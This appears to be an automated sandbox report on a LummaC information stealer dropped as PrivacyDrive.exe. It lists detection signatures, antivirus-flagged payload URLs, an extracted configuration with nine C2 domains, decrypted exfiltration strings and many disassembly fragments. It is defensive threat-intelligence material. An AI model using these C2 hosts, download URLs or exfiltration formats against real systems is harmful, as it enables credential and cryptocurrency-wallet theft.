Windows Analysis Report
http://google.com

Overview

General Information

Sample URL: http://google.com
Analysis ID: 1519588
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Powershell uses Background Intelligent Transfer Service (BITS)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Suspicious powershell command line found
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for URL or domain
Source: abortinoiwiam.shop Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop Avira URL Cloud: Label: malware
Source: priooozekw.shop Avira URL Cloud: Label: malware
Source: surroundeocw.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/u Avira URL Cloud: Label: malware
Source: candleduseiwo.shop Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il222.zip Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/ Avira URL Cloud: Label: malware
Source: racedsuitreow.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api9 Avira URL Cloud: Label: malware
Source: covvercilverow.shop Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop Avira URL Cloud: Label: malware
Source: deallyharvenw.shop Avira URL Cloud: Label: malware
Source: https://finalstepgo.com/uploads/il2.txt Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api Avira URL Cloud: Label: malware
Found malware configuration
Source: PrivacyDrive.exe.4252.16.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["covvercilverow.shop", "priooozekw.shop", "pumpkinkwquo.shop", "surroundeocw.shop", "deallyharvenw.shop", "abortinoiwiam.shop", "racedsuitreow.shop", "candleduseiwo.shop", "defenddsouneuw.shop"], "Build id": "yJEcaG--rui1222"}
Sample uses string decryption to hide its real strings
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: covvercilverow.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: surroundeocw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: abortinoiwiam.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: pumpkinkwquo.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: priooozekw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: deallyharvenw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: defenddsouneuw.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: racedsuitreow.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: candleduseiwo.shop
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp String decryptor: yJEcaG--rui1222
Source: https://www.google.com/ HTTP Parser: No favicon
Source: https://www.google.com/ HTTP Parser: No favicon
Source: https://www.google.com/ HTTP Parser: No favicon
Source: https://www.google.com/ HTTP Parser: No favicon
Source: https://www.google.com/ HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49834 version: TLS 1.2
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source: Binary string: _.nDb=_.J("VOy8xe");_.oDb=_.J("s2IYHc");_.pDb=_.J("ucVTnf");_.qDb=_.J("pU3PWb"); source: chromecache_242.1.dr, chromecache_193.1.dr
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000010.00000003.1510267405.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000000.1435518072.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe.15.dr
Source: Binary string: _.KDb=function(){var a=_.Jv;if(a.ka!==null)return a.ka;if(document.body){var b=_.Ql.N7(document.body).top;return a.ka=b}return 0};_.Jv=new _.Iv;_.Kv=function(a){_.Jv.WZa(a)};_.LDb=function(){return _.Jv.getScrollTop()};_.Lv=function(a,b){_.Jv.fixedUiScrollTo(a,b)};NDb=navigator.userAgent.match(/ GSA\/([.\d]+)/);MDb=NDb?NDb[1]:"";_.ODb=_.Vb&&_.pa(MDb,"4")>=0;_.PDb=_.Vb&&_.pa(MDb,"5.2")>=0;_.QDb=_.Vb&&_.pa(MDb,"4.3")>=0&&!(_.pa(MDb,"4.5")>=0); source: chromecache_242.1.dr, chromecache_193.1.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_047E2403
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_047D74E1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebp, word ptr [edi] 16_2_04800432
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, 0000000Bh 16_2_047F54B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 16_2_047CF4B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_047EF577
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+00000744h] 16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_047F45CB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_047E25AE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_047E8582
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_0480B612
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 16_2_047DF6C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_047C66B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_047EA692
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_047F076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_047F076F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 16_2_047C7712
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_047D6013
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_047D600C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 16_2_047ED0CE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 16_2_047ED134
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_047E2132
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 16_2_047D11B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_0480C2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_048082BB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_047F4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_047F4215
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_048012FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h 16_2_048012FC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_047F429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_047F429B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 16_2_04805272
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_047FC282
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_0480B3B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 16_2_047E8312
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 16_2_048063F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_047D539E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 16_2_047D4DDD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_047F1DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_04808D52
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_047E9DA7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0480BD62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 16_2_047E5D92
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 16_2_0480BED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_047F4E2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_047F4E18
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_047F0E11
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_04800EF0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_04804E22
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_047F3ED2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 16_2_047EFEC1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_047F3F33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_0480BFE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_047F3EB7
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 16_2_047DF835
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_04809832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 16_2_04809832
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 16_2_047D58A8
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 16_2_047DC952
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_047D2911
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_047D59AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 16_2_047D59AB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_047D7AF3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 16_2_047C8B72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_047F4B4C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_0480BBE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 16_2_04802B02
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 16_2_047D7BF4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 16_2_04800B62
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 16_2_047E0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 16_2_047E0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 16_2_059CF7B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_05A0A1E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_059F24B5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A0A5E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_059F2531
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 16_2_059F24D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] 16_2_059EE4C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 16_2_05A0A4D0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 16_2_059FF4EE
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, ebp 16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A03420
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_059F3419
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_059EF40F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_059F342B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 16_2_059EB6CC
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-18h] 16_2_059EB732
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-54h] 16_2_059E0730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_059D4611
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_059D460A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h 16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [esi], ax 16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp eax 16_2_059D61F2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 16_2_05A01100
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [edi], al 16_2_059F314A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, eax 16_2_059C7170
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then jmp ecx 16_2_059FF160
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp byte ptr [edi], 00000000h 16_2_059D60F1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-34h] 16_2_059E4390
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 16_2_059F03B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_059E83A5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 16_2_059D33DB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 16_2_05A0A360
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A07350
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 16_2_059C5D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_059EED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 16_2_059EED6D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_059E8C90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 16_2_059C4CB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 16_2_059DDCC2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov word ptr [eax], cx 16_2_05A09C10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_059D3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+28h] 16_2_059D3FA9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 16_2_059D0F0F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 16_2_059DAF50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov edi, ecx 16_2_059D3EA6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A07E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh 16_2_05A07E30
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then push ebx 16_2_059DDE33
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_059D399C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A099B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 16_2_05A049F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 16_2_059E6910
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_059F2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov byte ptr [ebx], al 16_2_059F2899
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp] 16_2_05A0A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 16_2_05A068B9
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 16_2_059FA880
